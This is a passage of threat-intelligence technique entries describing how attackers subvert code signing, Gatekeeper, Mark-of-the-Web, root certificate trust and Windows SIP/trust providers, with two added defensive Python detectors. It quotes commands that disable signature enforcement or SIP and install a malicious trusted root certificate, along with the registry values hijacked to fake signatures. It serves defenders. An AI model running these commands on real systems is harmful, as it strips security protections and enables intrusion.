Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. <sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup><sup>[[EclecticLightChecksonEXECodeSigning](https://app.tidalcyber.com/references/2885db46-4f8c-4c35-901c-7641c7701293)]</sup>

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:technique="Code Signing"

Code Signing Policy Modification

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.<sup>[[Microsoft DSE June 2017](https://app.tidalcyber.com/references/451bdfe3-0b30-425c-97a0-44727b70c1da)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.<sup>[[Microsoft Unsigned Driver Apr 2017](https://app.tidalcyber.com/references/5964ff2e-0860-4e00-8103-89ba6466314c)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup>

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup><sup>[[FireEye HIKIT Rootkit Part 2](https://app.tidalcyber.com/references/48448972-a5ed-4371-b930-b51dcb174b82)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup> Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.<sup>[[Microsoft TESTSIGNING Feb 2021](https://app.tidalcyber.com/references/c04153f9-d4c7-4349-9bef-3f883eec0028)]</sup><sup>[[Apple Disable SIP](https://app.tidalcyber.com/references/d7545e0c-f0b7-4be4-800b-06a02240385e)]</sup> Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.<sup>[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]</sup>

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c) using a signed, but vulnerable driver.<sup>[[Unit42 AcidBox June 2020](https://app.tidalcyber.com/references/f3f2eca0-fda3-451e-bf13-aacb14668e48)]</sup><sup>[[GitHub Turla Driver Loader](https://app.tidalcyber.com/references/ed3534be-06ce-487b-911d-abe2fba70210)]</sup>

The tag is: misp-galaxy:technique="Code Signing Policy Modification"

Gatekeeper Bypass

Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as a layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.<sup>[[TheEclecticLightCompany Quarantine and the flag](https://app.tidalcyber.com/references/7cce88cc-fbfb-43e1-a330-ac55bce9e394)]</sup><sup>[[TheEclecticLightCompany apple notarization](https://app.tidalcyber.com/references/80c840ab-782a-4f15-bc7b-2d2ab4e51702)]</sup>

Based on an opt-in system, when files are downloaded, an extended attribute (xattr) called com.apple.quarantine (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first-run applications with the quarantine flag set, Gatekeeper executes the following functions:

  1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.<sup>[[OceanLotus for OS X](https://app.tidalcyber.com/references/6e9acc29-06af-4915-8e01-7dcccb204530)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

  2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.

  3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.

  4. Notarization - Using the api.apple-cloudkit.com API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which results in a prompt about executing an “unauthorized app”, and the security policy will be modified.

Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.<sup>[[theevilbit gatekeeper bypass 2021](https://app.tidalcyber.com/references/d00f373d-2133-47c3-9b0a-104ecc9a6869)]</sup><sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup>

Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381).

The tag is: misp-galaxy:technique="Gatekeeper Bypass"

Install Root Certificate

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate.<sup>[[Wikipedia Root Certificate](https://app.tidalcyber.com/references/68b9ccbb-906e-4f06-b5bd-3969723c3616)]</sup> Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.<sup>[[Operation Emmental](https://app.tidalcyber.com/references/36443369-4fa9-4802-8b21-68cc382b949f)]</sup>

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) capability for intercepting information transmitted over secure TLS/SSL communications.<sup>[[Kaspersky Superfish](https://app.tidalcyber.com/references/3d554c05-992c-41f3-99f4-6b0baac56b3a)]</sup>

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.<sup>[[SpectorOps Code Signing Dec 2017](https://app.tidalcyber.com/references/3efc5ae9-c63a-4a07-bbbd-d7324acdbaf5)]</sup>

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain.<sup>[[objective-see ay mami 2018](https://app.tidalcyber.com/references/1b1d656c-4fe6-47d1-9ce5-a70c33003507)]</sup>

The tag is: misp-galaxy:technique="Install Root Certificate"

Mark-of-the-Web Bypass

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.<sup>[[Microsoft Zone.Identifier 2020](https://app.tidalcyber.com/references/2efbb7be-3ca1-444a-8584-7ceb08101e74)]</sup> Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup><sup>[[Intezer Russian APT Dec 2020](https://app.tidalcyber.com/references/88d8a3b7-d994-4fd2-9aa1-83b79bccda7e)]</sup>

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW, but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is an NTFS feature and many container files do not support NTFS alternate data streams. After a container file is extracted and/or mounted, the files contained within it may be treated as local files on disk and run without protections.<sup>[[Beek Use of VHD Dec 2020](https://app.tidalcyber.com/references/7a1131ab-e4b1-4569-8e28-3650312cc804)]</sup><sup>[[Outflank MotW 2020](https://app.tidalcyber.com/references/54d9c59f-800a-426f-90c8-0d1cb2bea1ea)]</sup>
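The `Zone.Identifier` stream is small INI-style text, so a responder can read and interpret it directly when triaging a downloaded file or checking whether contents extracted from a container kept their mark. The following Python is an added example, not code from the page or from MISP; `SAMPLE_STREAM` and its URLs are constructed, and `CONTAINER_EXTENSIONS` is limited to the four formats the paragraph above names. The zone numbers follow the Windows URL security zones (0 Local Machine, 1 Local Intranet, 2 Trusted Sites, 3 Internet, 4 Restricted Sites).

```python
"""Parse and interpret the Zone.Identifier alternate data stream (Mark-of-the-Web).
Added example over constructed stream content; on Windows the same text is read
from '<file>:Zone.Identifier'. Not code from the page."""
import os
from typing import Optional

ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites", 3: "Internet", 4: "Restricted Sites"}

# Container formats named on the page whose extracted/mounted contents may not carry the mark.
CONTAINER_EXTENSIONS = {".arj", ".gzip", ".iso", ".vhd"}

# Constructed sample of a stream written by a browser download (CRLF line endings as on disk).
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/downloads/\r\n"
    "HostUrl=https://cdn.example.invalid/tools.iso\r\n"
)


def parse_zone_identifier(text: str) -> dict:
    """Return {'ZoneId': int, 'ReferrerUrl': str, 'HostUrl': str, ...} from the
    [ZoneTransfer] section; {} if the section is absent. Unparsable ZoneId is dropped."""
    result = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip(), value.strip()
            if key == "ZoneId":
                try:
                    result[key] = int(value)
                except ValueError:
                    continue
            else:
                result[key] = value
    return result


def zone_name(zone_id: int) -> str:
    return ZONE_NAMES.get(zone_id, f"unknown ({zone_id})")


def is_internet_marked(text: str) -> bool:
    """True for Internet (3) or Restricted Sites (4), the zones for which Protected
    View and SmartScreen apply. A missing stream means the file is treated as local."""
    return parse_zone_identifier(text).get("ZoneId", 0) >= 3


def read_motw(path: str) -> Optional[str]:
    """Read the stream from an NTFS file (Windows only). None when the file has no mark."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def may_lose_motw(filename: str) -> bool:
    """True when the file is a container whose contents may not inherit the mark."""
    return os.path.splitext(filename)[1].lower() in CONTAINER_EXTENSIONS


if __name__ == "__main__":
    info = parse_zone_identifier(SAMPLE_STREAM)
    print(f"zone {info['ZoneId']} ({zone_name(info['ZoneId'])}), fetched from {info.get('HostUrl')}")
    print("contents may lose the mark:", may_lose_motw(info.get("HostUrl", "")))
```

The `HostUrl` and `ReferrerUrl` fields are the forensic value of the stream: even after the payload inside an extracted ISO has no mark of its own, the ISO that delivered it usually still records where it came from.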

The tag is: misp-galaxy:technique="Mark-of-the-Web Bypass"

SIP and Trust Provider Hijacking

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode <sup>[[Microsoft Authenticode](https://app.tidalcyber.com/references/33efd1a3-ffe9-42b3-ae12-970ed11454bf)]</sup> digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, <sup>[[Microsoft WinVerifyTrust](https://app.tidalcyber.com/references/cc14faff-c164-4135-ae36-ba68e1a50024)]</sup> which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) <sup>[[EduardosBlog SIPs July 2008](https://app.tidalcyber.com/references/ac37f167-3ae9-437b-9215-c30c1ab4e249)]</sup> to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all <sup>[[Microsoft Catalog Files and Signatures April 2017](https://app.tidalcyber.com/references/5b6ae460-a1cf-4afe-a0c8-d6ea24741ebe)]</sup>) and are identified by globally unique identifiers (GUIDs). <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

Similar to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP <sup>[[GitHub SIP POC Sept 2017](https://app.tidalcyber.com/references/1a9bc729-532b-47ab-89ba-90b0ff41f8aa)]</sup> (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).
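All three Registry hijacks listed above leave the same trace: a `Dll`/`FuncName` (or `DLL`/`Function`) pair under the Cryptography key that no longer matches what a clean system registers. A baseline comparison of an exported copy of that subtree catches each variant, whether the DLL name changed, the same name was dropped in a writable directory, or only the exported function was swapped. The following Python is an added example, not code from the page, from MISP or from the cited SpectorOps research; `SAMPLE_REG_EXPORT` and the tampered values in it are constructed. The `BASELINE` table lists the stock `wintrust.dll` registrations for the Portable Executable SIP and the Authenticode trust provider as this author understands them; treat it as an assumption and record the real baseline from a known-good host of the same Windows build. Value names are matched with and without a leading `$`, since both spellings appear across sources.

```python
"""Compare SIP and trust-provider registrations from a .reg export against a
recorded baseline. Added example over a constructed export; not page code."""
import re

PE_SIP_GUID = "{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"            # Portable Executable SIP
AUTHENTICODE_TP_GUID = "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}"   # Authenticode trust provider

# Assumed clean values: (dll basename, exported function). Record your own from a known-good host.
BASELINE = {
    "CryptSIPDllGetSignedDataMsg\\" + PE_SIP_GUID: ("wintrust.dll", "CryptSIPGetSignedDataMsg"),
    "CryptSIPDllVerifyIndirectData\\" + PE_SIP_GUID: ("wintrust.dll", "CryptSIPVerifyIndirectData"),
    "Providers\\Trust\\FinalPolicy\\" + AUTHENTICODE_TP_GUID: ("wintrust.dll", "SoftpubAuthenticode"),
}
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
SUBTREE = "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\"
KEY_RE = re.compile(r"^\[(?P<key>HKEY_[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')

# Constructed export: first key clean, second points at a same-named DLL outside System32,
# third keeps the real DLL but names a different export.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}]
"Dll"="C:\\Windows\\System32\\WINTRUST.dll"
"FuncName"="CryptSIPGetSignedDataMsg"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}]
"Dll"="C:\\Users\\Public\\WINTRUST.dll"
"FuncName"="CryptSIPVerifyIndirectData"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}]
"$DLL"="C:\\Windows\\System32\\WINTRUST.DLL"
"$Function"="ConstructedAlwaysSucceedsExport"
"""


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} for the REG_SZ values of a .reg export."""
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            entries[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            entries[current][m.group("name")] = m.group("value").replace("\\\\", "\\")  # .reg escapes backslashes
    return entries


def crypto_subkey(key_path):
    """Map both the native and the WOW6432Node view of the Cryptography subtree onto
    the baseline key form, dropping the 'OID\\EncodingType 0\\' segment for SIP entries."""
    upper = key_path.upper()
    for prefix in (SUBTREE, SUBTREE.replace("SOFTWARE\\", "SOFTWARE\\WOW6432NODE\\")):
        if upper.startswith(prefix):
            rest = key_path[len(prefix):]
            if rest.upper().startswith("OID\\ENCODINGTYPE 0\\"):
                rest = rest[len("OID\\EncodingType 0\\"):]
            return rest
    return None


def check_sip_and_trust_providers(entries):
    """Return [(subkey, reason)] for every baseline-covered registration that deviates."""
    findings = []
    for key_path, values in entries.items():
        sub = crypto_subkey(key_path)
        if sub is None:
            continue
        expected = next((v for k, v in BASELINE.items() if k.upper() == sub.upper()), None)
        if expected is None:
            continue  # registrations outside the baseline are not judged here
        norm = {k.lstrip("$").lower(): v for k, v in values.items()}
        dll = norm.get("dll", "")
        func = norm.get("funcname", norm.get("function", ""))
        dll_dir, _, dll_name = dll.rpartition("\\")
        if dll_name.lower() != expected[0]:
            findings.append((sub, f"Dll changed to {dll or '<missing>'}"))
        elif dll_dir.lower() not in TRUSTED_DIRS:
            findings.append((sub, f"Dll loaded from unexpected directory {dll_dir}"))
        if func != expected[1]:
            findings.append((sub, f"function changed to {func or '<missing>'}"))
    return findings


if __name__ == "__main__":
    for subkey, reason in check_sip_and_trust_providers(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{subkey}: {reason}")
```

To feed it a real export, run `reg export HKLM\SOFTWARE\Microsoft\Cryptography` on the host (and the `WOW6432Node` subtree on 64-bit systems), decode the resulting file as UTF-16 before parsing, and remember the note above: the same components can be hijacked by DLL search order without any Registry change, so a clean comparison does not replace verifying which `wintrust.dll` is actually loaded.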

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

The tag is: misp-galaxy:technique="SIP and Trust Provider Hijacking"

Subvert Trust Controls

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or the user receiving an indication that they are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.<sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup> Adversaries may also create or steal code signing certificates to acquire trust on target systems.<sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup><sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup>

The tag is: misp-galaxy:technique="Subvert Trust Controls"

Compromise Hardware Supply Chain

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: misp-galaxy:technique="Compromise Hardware Supply Chain"

Compromise Software Dependencies and Development Tools

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:technique="Compromise Software Dependencies and Development Tools"

Compromise Software Supply Chain

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup>

The tag is: misp-galaxy:technique="Compromise Software Supply Chain"

Supply Chain Compromise

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>

The tag is: misp-galaxy:technique="Supply Chain Compromise"

CMSTP

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. <sup>[[Microsoft Connection Manager Oct 2009](https://app.tidalcyber.com/references/0b0880a8-82cc-4e23-afd9-95d099c753a4)]</sup> CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. <sup>[[Twitter CMSTP Usage Jan 2018](https://app.tidalcyber.com/references/836621f3-83e1-4c55-8e3b-740fc9ba1e46)]</sup> Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a) / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> and/or COM scriptlets (SCT) from remote servers. <sup>[[Twitter CMSTP Jan 2018](https://app.tidalcyber.com/references/3847149c-1463-4d94-be19-0a8cf1db0b58)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup> This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.

CMSTP.exe can also be abused to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup>

The tag is: misp-galaxy:technique="CMSTP"

Compiled HTML File

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. <sup>[[Microsoft HTML Help May 2018](https://app.tidalcyber.com/references/f9daf15d-61ea-4cfa-a4e8-9d33d1acd28f)]</sup> CHM content is displayed using underlying components of the Internet Explorer browser <sup>[[Microsoft HTML Help ActiveX](https://app.tidalcyber.com/references/ae5728bd-571a-451f-9ba3-3198067135b4)]</sup> loaded by the HTML Help executable program (hh.exe). <sup>[[Microsoft HTML Help Executable Program](https://app.tidalcyber.com/references/1af226cc-bb93-43c8-972e-367482c5d487)]</sup>

